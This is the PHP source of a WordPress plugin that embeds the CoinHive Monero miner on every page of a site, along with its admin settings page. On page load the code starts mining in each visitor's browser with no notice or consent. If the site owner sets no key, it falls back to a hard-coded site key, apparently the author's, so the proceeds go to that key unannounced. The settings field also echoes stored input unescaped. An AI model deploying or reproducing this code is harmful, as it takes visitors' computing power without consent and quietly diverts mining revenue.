<?php

/*
Plugin Name: Monero Miner Integration
Plugin URI: https://www.radikalblogger.de/monero
Description: Embed a Monero Miner in your Website (https://coin-hive.com/)
Author: Michael Schmitt
Version: 1.0
Author URI: https://www.radikalblogger.de/
*/
/*
 * Website https://coin-hive.com/
 * Dashboard https://coin-hive.com/settings/sites
 */


add_action('wp_enqueue_scripts', function () {

	$options = get_option('schmiddim_integrate_monero_miner_settings');
	$siteKeyPublic = $options['schmiddim_integrate_monero_miner_text_field_0'];

	if (null == $siteKeyPublic) {
		$siteKeyPublic = 'ghBR4D6ilam4hIBTYbItcbtLBUKW719e';
	}

	$js = '
		var miner = new CoinHive.Anonymous("' . $siteKeyPublic . '");
		miner.start();
		// Listen on events
		/*
		miner.on("found", function() { console.log("Hash found"); })
		miner.on("accepted", function() {console.log("Hash accepted by the pool");  })
		*/
		// Update stats once per second
		setInterval(function() {

			var hashesPerSecond = miner.getHashesPerSecond();
			var totalHashes = miner.getTotalHashes();
			var acceptedHashes = miner.getAcceptedHashes();

			// Output to HTML elements...
		}, 1000);

		';
	wp_enqueue_script('schmiddim_integrate_monero_miner', "https://coin-hive.com/lib/coinhive.min.js", [], '1.0');
	wp_add_inline_script('schmiddim_integrate_monero_miner',$js);
});


//generated By http://wpsettingsapi.jeroensormani.com/
add_action('admin_menu', 'schmiddim_integrate_monero_miner_add_admin_menu');
add_action('admin_init', 'schmiddim_integrate_monero_miner_settings_init');

function schmiddim_integrate_monero_miner_add_admin_menu()
{
	add_submenu_page('options-general.php', 'Monero Integration Settings', 'Monero Integration', 'manage_options', 'schmiddim_integrate_monero_miner', 'schmiddim_integrate_monero_miner_options_page');
}


function schmiddim_integrate_monero_miner_settings_init()
{

	register_setting('pluginPage', 'schmiddim_integrate_monero_miner_settings');

	add_settings_section(
		'schmiddim_integrate_monero_miner_pluginPage_section',
		__('Enter a Site Key', 'schmiddim'),
		'schmiddim_integrate_monero_miner_settings_section_callback',
		'pluginPage'
	);

	add_settings_field(
		'schmiddim_integrate_monero_miner_text_field_0',
		__('Site Key (public)', 'schmiddim'),
		'schmiddim_integrate_monero_miner_text_field_0_render',
		'pluginPage',
		'schmiddim_integrate_monero_miner_pluginPage_section'
	);


}


function schmiddim_integrate_monero_miner_text_field_0_render()
{

	$options = get_option('schmiddim_integrate_monero_miner_settings');
	?>
	<input type='text' name='schmiddim_integrate_monero_miner_settings[schmiddim_integrate_monero_miner_text_field_0]'
		   value='<?php echo $options['schmiddim_integrate_monero_miner_text_field_0']; ?>'>
	<?php

}


function schmiddim_integrate_monero_miner_settings_section_callback()
{
	echo __('Sign up at <a href="https://coin-hive.com/">https://coin-hive.com/</a> and create a new Site. Never enter or share the private Key!', 'schmiddim');
}


function schmiddim_integrate_monero_miner_options_page()
{

	?>
	<form action='options.php' method='post'>

		<h2>Miner Settings</h2>

		<?php
		settings_fields('pluginPage');
		do_settings_sections('pluginPage');
		submit_button();
		?>

	</form>
	<?php

}